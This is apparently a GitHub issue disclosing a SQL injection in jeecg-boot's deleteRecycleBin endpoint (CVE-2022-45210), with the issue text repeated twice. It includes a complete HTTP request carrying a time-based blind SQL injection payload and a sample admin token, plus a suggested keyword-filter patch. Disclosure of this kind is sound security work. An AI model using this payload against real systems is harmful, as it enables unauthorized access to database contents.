deleteLogicDeleted. You can see that no precompiling is performed
SysUserController.java
SysUserServiceImpl.java
So Users can pass in malicious parameters through http requests to achieve SQL injection
poc
The website will return immediately when the following content is passed in
After the following content is passed in, the website will return after a delay of 2 seconds
vuln
attack can user this to get data from database
payload:
DELETE /jeecg-boot/sys/user/deleteRecycleBin?userIds=')+OR+SLEEP(2)+OR+id+IN+(' HTTP/1.1
Host: 192.168.1.1:8088
Content-Type: application/x-www-form-urlencoded
Accept: /
knife4j-gateway-code: ROOT
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NjY2NjgzNjYsInVzZXJuYW1lIjoiYWRtaW4ifQ.WUx3LR8rvOp92_GueiJtlqtjV4tDRnOZos_-IAp34nA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Request-Origion: Knife4j
Origin: http://192.168.1.1:8088
Referer: http://192.168.1.1:8088/jeecg-boot/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
patch
In (${})
It seems that this cannot be modified to precompile
So it is recommended to add some keywords such as')
The text was updated successfully, but these errors were encountered:
/sys/user/deleteRecycleBin is affected by sql injection #4125
azraelxuemo
changed the title
/sys/user/deleteRecycleBin is affected by sql injection
[CVE-2022-45210]/sys/user/deleteRecycleBin is affected by sql injection
Dec 7, 2022
XKC1025
pushed a commit
to XKC1025/jeecg-boot
that referenced
this issue
Mar 13, 2023
sysUserMapper.xml
deleteLogicDeleted. You can see that no precompiling is performed

SysUserController.java
SysUserServiceImpl.java

So Users can pass in malicious parameters through http requests to achieve SQL injectionpoc
The website will return immediately when the following content is passed in


After the following content is passed in, the website will return after a delay of 2 seconds
vuln
attack can user this to get data from database
payload:
DELETE /jeecg-boot/sys/user/deleteRecycleBin?userIds=')+OR+SLEEP(2)+OR+id+IN+(' HTTP/1.1
Host: 192.168.1.1:8088
Content-Type: application/x-www-form-urlencoded
Accept: /
knife4j-gateway-code: ROOT
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NjY2NjgzNjYsInVzZXJuYW1lIjoiYWRtaW4ifQ.WUx3LR8rvOp92_GueiJtlqtjV4tDRnOZos_-IAp34nA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Request-Origion: Knife4j
Origin: http://192.168.1.1:8088
Referer: http://192.168.1.1:8088/jeecg-boot/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
patch
In (${})
It seems that this cannot be modified to precompile
So it is recommended to add some keywords such as')
The text was updated successfully, but these errors were encountered: